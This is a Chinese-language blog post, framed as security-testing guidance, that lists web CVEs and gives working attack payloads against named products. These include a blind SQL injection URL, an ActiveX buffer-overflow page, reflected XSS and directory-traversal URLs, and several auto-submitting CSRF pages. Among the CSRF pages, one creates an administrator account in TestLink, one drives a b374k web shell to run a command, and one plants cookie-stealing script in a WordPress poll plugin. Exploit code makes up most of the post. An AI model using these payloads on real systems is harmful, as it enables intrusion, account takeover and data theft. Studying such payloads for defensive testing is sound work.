實務常見網站弱點CVE與測試攻擊範例

實務常見網站弱點CVE與測試攻擊範例

這篇文章主要介紹幾個實際網站弱點的個案與範例程式。

這些範例測試程式都是實際產品所發生的弱點。

筆者用這些例子說明在安全測試中,

如何運用這些測試技巧加入這些測試個案,防止產品有這樣的弱點。

常見的網站CVE

  • File path traversal CVE-2013-2678
  •  Cross-site scripting (reflected) CVE-2013-2679
  •  Cleartext submission of password CVE-2013-2680
  •  Password field with autocomplete enabled CVE-2013-2681
  •  Frameable response (Clickjacking) CVE-2013-2682
  •  Private IP addresses disclosed CVE-2013-2683
  •  HTML does not specify charset CVE-2013-2684

Blind SQL injection 測試範例

/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=

ActiveX control Buffer overflow 測試範例

ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
<!-- saved from url=(0014)about:internet --> 
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
    x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>

Reflected XSS測試範例

/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

Directory traversal測試範例

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

CSRF 攻擊的測試範例

Http Post 就不會受到CSRF攻擊嗎? 這個迷思是錯的!

看看下列這幾個”實際”的例子,CSRF甚至可以用來做 command 執行與系統管理員帳號的建立。

CSRF 與 JavaScript 其實並列網站攻擊嚴重性之首。

<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
 
<form id='ABYSMALGODS' action='
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
method='post'>
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
<script>document.getElementById('ABYSMALGODS').submit()</script>
</form>
<html>
    <body onload="javascript:document.forms[0].submit()">
    <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
    <input type="hidden" name="action" value="p_add" />
    <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
    <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
    <input type="submit" name="submit" value="Submit" class="button" />
    </form>
</html>

 

 <html>
This is CSRF testing sample for POST.
The POST hidden variables listed below may change based on the target website.

  <body>
    <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
      <input type="hidden" name="kadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Leave a Reply

Your email address will not be published.